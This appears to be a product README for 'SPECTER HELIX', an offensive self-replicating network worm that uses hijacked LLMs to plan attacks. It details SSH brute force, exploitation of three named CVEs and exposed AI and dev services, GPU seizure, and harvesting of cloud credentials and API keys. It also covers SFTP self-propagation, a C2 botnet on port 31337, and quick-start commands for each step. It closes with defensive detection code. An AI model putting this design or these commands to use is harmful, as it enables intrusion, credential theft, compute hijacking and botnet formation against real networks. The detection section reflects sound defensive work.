T142 — L41 AI-NATIVE NETWORK WORM

Red Specter SPECTER HELIX

The worm that thinks. Every infected node funds the next attack. GPU compute seized, inference hijacked, strategy generated — autonomously.

An AI-native self-replicating network worm that uses hijacked LLMs as its attack engine. DeepSeek-R1 generates per-target attack strategies from the worm's own stolen GPU pool. Marginal cost of each new attack: zero.

237 Tests · 8 Subsystems · 5 WMD Classes · 3 CVEs
★ MILSPEC v2.0.0 | Network topology survey · Adaptive autonomous propagation · Coordinated DDoS swarm · Upgraded C2 mesh · Military-grade upgrade | 369 TESTS · Ed25519 + ML-DSA-65

Overview

SPECTER HELIX is NIGHTFALL's Layer 41 module — AI-Native Network Worm. It implements a new species of malware: one where the LLM is the attack engine, not the target. Infected machines contribute GPU compute to the worm's inference pool. DeepSeek-R1 1.5b runs locally on seized hardware to generate tailored attack strategies for each new target. As the botnet grows, attack intelligence scales with it — cost of inference approaches zero.

HELIX opens attack surface coverage to infrastructure that was previously out-of-scope for AI-specific offensive tools: exposed Ollama endpoints, Jupyter notebooks, Docker sockets, Redis instances, Ivanti appliances, Next.js middleware, and SSH-accessible machines. The connecting thread: every compromised node adds LLM compute. Every LLM compute node makes the next compromise smarter.

SPECTER HELIX is an authorized security research tool. INJECT gate requires INJECT_KEY (Ed25519 private key path). UNLEASHED gate (autonomous propagation) requires ROE file containing "autonomous propagation authorised". DESTROY gate (botnet formation) requires ROE "botnet formation authorised" + --confirm-botnet-deploy. All reports signed HLX-{hex12}. Use only within authorized engagements.

CVE Coverage

| CVE | Product | CVSS | Attack Type | HELIX Vector |
|---|---|---|---|---|
| CVE-2025-29927 | Next.js Middleware | 9.1 CRITICAL | Auth bypass via x-middleware-subrequest header | INFECT → CVE_2025_29927 |
| CVE-2024-9379 | Ivanti CSA | 9.6 CRITICAL | Command injection via /gsb/reports.php | INFECT → CVE_2024_9379 |
| CVE-2025-0282 | Ivanti Connect Secure | 9.0 CRITICAL | Stack-based buffer overflow, unauthenticated RCE | INFECT → CVE_2025_0282 |

Architecture: The HELIX Worm Loop

Propagation Cycle

1. SURVEY: Scan CIDR range. Detect open ports, fingerprint GPU presence, Ollama/vLLM endpoints, Docker socket, Redis, Jupyter, Ivanti, Next.js. Prioritise targets by attack_surface_score (GPU+10, inference+8, Ivanti+9, Docker+7, Jupyter+6).
2. INFECT: Dispatch best exploit vector. SSH brute (25 weak-cred + 6 GPU-user pairs). CWE-306: exposed Ollama/Jupyter/Docker/Redis. CVE-2025-29927 Next.js middleware bypass. CVE-2024-9379 Ivanti injection.
3. HIJACK: Detect nvidia-smi. Commandeer existing inference endpoints or bootstrap Ollama via SSH (deepseek-r1:1.5b or qwen2.5:0.5b fallback). Add to shared inference pool. MIN_VRAM: 4096 MB.
4. REASON: For each new target, POST fingerprint to inference pool → DeepSeek-R1 generates JSON attack strategy with <think> chain. Rule-based fallback if no GPU pool yet.
5. HARVEST: Extract API keys (10 regex patterns: OpenAI/Anthropic/AWS/HF/GitHub/Replicate), SSH private keys, ~/.aws/credentials, env vars, model paths from /proc/1/environ.
6. PROPAGATE: Base64-encode worm. SFTP transfer via paramiko. Execute bootstrap.sh on target. BFS depth-configurable. Each new node repeats from step 1 on its own subnets.
7. BOTNET: XChaCha20-Poly1305 encrypted TCP heartbeat to C2 on port 31337. Node registry with compute aggregation. Fleet summary: total GPU GB, inference endpoints, active nodes.

Subsystems

SURVEY [OPEN gate]

Network discovery: parallel port scan (64 workers, ThreadPoolExecutor), GPU detection, inference endpoint probing (Ollama/vLLM/llamacpp), Ivanti/Next.js fingerprinting, OS banner grabbing. Returns prioritised TargetHost list.

INFECT [INJECT gate]

Multi-vector exploitation: SSH brute-force (paramiko AutoAddPolicy), CWE-306 exposed service access (Ollama/Jupyter/Docker/Redis), CVE-2025-29927 Next.js middleware auth bypass, CVE-2024-9379 Ivanti CSA command injection. Auto-dispatches best_vector per target.

HIJACK [INJECT gate]

GPU resource seizure: detect nvidia-smi (local and remote via SSH), bootstrap Ollama on targets with sufficient VRAM (MIN_VRAM_MB=4096), pull DeepSeek-R1:1.5b or qwen2.5:0.5b fallback. Build shared inference pool from fleet.

REASON [INJECT gate]

LLM-powered attack strategy: fingerprint target → PromptTemplate → POST to Ollama/vLLM API → extract DeepSeek ⟨think⟩ reasoning chain → parse JSON AttackStrategy (vector, confidence, fallbacks, payload, credentials). Rule-based fallback when no inference pool.

HARVEST [INJECT gate]

Credential extraction via SSH: env vars (env | grep), 12 config file paths (~/.aws/credentials, ~/.kube/config, ~/.ssh/id_*), 10 API key regex patterns (OpenAI sk-proj-, Anthropic sk-ant-, AWS AKIA, GitHub ghp_/ghs_, HF hf_, Replicate r8_), /proc/1/environ.

PROPAGATE [UNLEASHED gate]

BFS self-replication: base64-encode worm source, SFTP transfer via paramiko, execute bootstrap.sh on target, check for HELIX_DEPLOYED_PID marker. Configurable depth and max_targets_per_hop. Requires ROE "autonomous propagation authorised".

BOTNET [DESTROY gate]

XChaCha20-Poly1305 C2 mesh (PyNaCl SecretBox): HelixC2 TCP server port 31337, threaded listener, node registry, 60s heartbeat. Fleet aggregation: total_compute_gb(), active_nodes(), inference_pool(). Requires ROE "botnet formation authorised" + --confirm-botnet-deploy.

REPORT [OPEN gate]

HLX-{hex12} Ed25519-signed canonical JSON reports. Build: stats (discovered/infected/GPU nodes/compute/hops), WMD classes, CVE references, MITRE techniques (T1190, T1059.004, T1110.001, T1496, T1041, T1584.005, T1071.001, AML.T0012/T0040/T0048), fleet botnet nodes.

WMD Classification

ai_native_network_worm · gpu_resource_hijack_at_scale · adaptive_botnet_formation · autonomous_llm_attack_engine · self_funding_cyberweapon

MITRE ATT&CK Mapping

| Technique | Name | HELIX Behaviour |
|---|---|---|
| T1190 | Exploit Public-Facing Application | CVE-2025-29927 / CVE-2024-9379 / CWE-306 |
| T1059.004 | Unix Shell | Command injection via Ivanti / bootstrap.sh |
| T1110.001 | Brute Force: Password Guessing | SSH brute with 31-pair credential list |
| T1496 | Resource Hijacking | GPU seizure via nvidia-smi / Ollama bootstrap |
| T1041 | Exfiltration Over C2 Channel | API keys / SSH keys over encrypted TCP C2 |
| T1584.005 | Compromise Infrastructure: Botnet | XChaCha20-Poly1305 C2 fleet on port 31337 |
| T1071.001 | Application Layer Protocol: Web | Ollama /api/chat inference pool comms |
| AML.T0012 | Valid Accounts — ML Pipeline | Credential harvest for ML API keys |
| AML.T0040 | ML Model Inference API Access | LLM hijacking via exposed Ollama endpoints |
| AML.T0048 | Steal ML Model | Model path enumeration during harvest |

Gate Structure

| Gate | Requirement | Unlocks |
|---|---|---|
| OPEN | None | SURVEY, REPORT |
| INJECT | INJECT_KEY env → Ed25519 key file | INFECT, HIJACK, REASON, HARVEST |
| UNLEASHED | INJECT + ROE file with "autonomous propagation authorised" | PROPAGATE (BFS self-replication) |
| DESTROY | UNLEASHED + ROE "botnet formation authorised" + --confirm-botnet-deploy | BOTNET (C2 mesh formation) |

Quick Start

# Network discovery
specter-helix survey --target 10.0.0.0/24

# Infect a target [INJECT gate]
export INJECT_KEY=/path/to/key.ed25519
specter-helix infect --target 10.0.0.5

# Seize GPU compute [INJECT gate]
specter-helix hijack --target 10.0.0.5 --credential root:root

# Generate LLM attack strategy [INJECT gate]
specter-helix reason --target 10.0.0.5 --inference 10.0.0.5:11434

# Harvest credentials and API keys [INJECT gate]
specter-helix harvest --target 10.0.0.5 --credential root:root

# Self-replicate [UNLEASHED gate]
export UNLEASHED_KEY=/path/to/unleashed.ed25519
specter-helix propagate --target 10.0.0.0/24 --roe /path/to/roe.txt

# C2 formation [DESTROY gate]
export DESTROY_KEY=/path/to/destroy.ed25519
specter-helix botnet --port 31337 --roe /path/to/roe.txt --confirm-botnet-deploy

# Generate signed report
specter-helix report --targets-discovered 50 --targets-infected 12 --gpu-nodes 4 --compute-gb 80
        

Defensive Pair

SPECTER HELIX maps to AI Shield M-TBD HELIX SENTINEL (TBD). Monitor for: unusual Ollama bootstrap activity, outbound port 31337 TCP, nvidia-smi invocation from non-standard users, mass credential file reads, rapid SSH auth attempts from internal IPs.
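
The monitoring list above, expressed as detection logic over host and network telemetry. This is an added example, not code from SPECTER HELIX or AI Shield; the event schema, thresholds, allowlists and the sample events are assumptions constructed for illustration.

```python
import ipaddress
from collections import defaultdict

INTERNAL = ipaddress.ip_network("10.0.0.0/8")   # assumption: the internal address space
GPU_USERS = {"mlops"}                           # assumption: accounts expected to run nvidia-smi
INFERENCE_HOSTS = {"10.0.0.20"}                 # assumption: approved Ollama hosts
CRED_PATHS = (".aws/credentials", ".kube/config", "/.ssh/id_", "/proc/1/environ")
SSH_FAILS, CRED_READS, WINDOW_S = 10, 3, 60     # assumed thresholds, tune per environment

def burst(times, n, window):
    """True if any n of the timestamps fall within `window` seconds."""
    times = sorted(times)
    return any(times[i + n - 1] - times[i] <= window for i in range(len(times) - n + 1))

def detect(events):
    """Map each host to the set of indicators it triggered."""
    hits, ssh, reads = defaultdict(set), defaultdict(list), defaultdict(dict)
    for e in events:
        if e["type"] == "flow" and e["proto"] == "tcp" and e["dport"] == 31337:
            hits[e["src"]].add("tcp_31337")
        elif e["type"] == "exec":
            prog = (e["cmd"].split() or [""])[0].rsplit("/", 1)[-1]  # basename of argv[0]
            if prog == "nvidia-smi" and e["user"] not in GPU_USERS:
                hits[e["host"]].add("nvidia_smi_unexpected_user")
            if prog == "ollama" and e["host"] not in INFERENCE_HOSTS:
                hits[e["host"]].add("ollama_on_unapproved_host")
        elif e["type"] == "file_read" and any(p in e["path"] for p in CRED_PATHS):
            reads[e["host"]].setdefault(e["path"], e["ts"])   # first read per distinct file
        elif e["type"] == "ssh_fail" and ipaddress.ip_address(e["src"]) in INTERNAL:
            ssh[e["src"]].append(e["ts"])
    for host, seen in reads.items():
        if burst(seen.values(), CRED_READS, WINDOW_S):
            hits[host].add("mass_credential_reads")
    for src, times in ssh.items():
        if burst(times, SSH_FAILS, WINDOW_S):
            hits[src].add("internal_ssh_auth_burst")
    return dict(hits)

# Constructed sample telemetry (not from a real incident); the event schema is an assumption.
SAMPLE = (
    [{"type": "ssh_fail", "src": "10.0.0.5", "ts": 100 + i} for i in range(12)]
    + [{"type": "ssh_fail", "src": "10.0.0.8", "ts": 100}]
    + [{"type": "file_read", "host": "10.0.0.5", "path": p, "ts": 130 + i} for i, p in
       enumerate(["/root/.aws/credentials", "/root/.kube/config", "/root/.ssh/id_rsa"])]
    + [{"type": "exec", "host": "10.0.0.5", "user": "www-data", "cmd": "/usr/bin/nvidia-smi -L", "ts": 140},
       {"type": "exec", "host": "10.0.0.5", "user": "www-data", "cmd": "ollama serve", "ts": 150},
       {"type": "exec", "host": "10.0.0.20", "user": "mlops", "cmd": "nvidia-smi", "ts": 151},
       {"type": "flow", "src": "10.0.0.5", "dst": "203.0.113.9", "dport": 31337, "proto": "tcp", "ts": 200}]
)
```

On the sample, only 10.0.0.5 is flagged, with all five indicators; the single SSH failure from 10.0.0.8 and the nvidia-smi run by mlops on the approved GPU host stay below the thresholds.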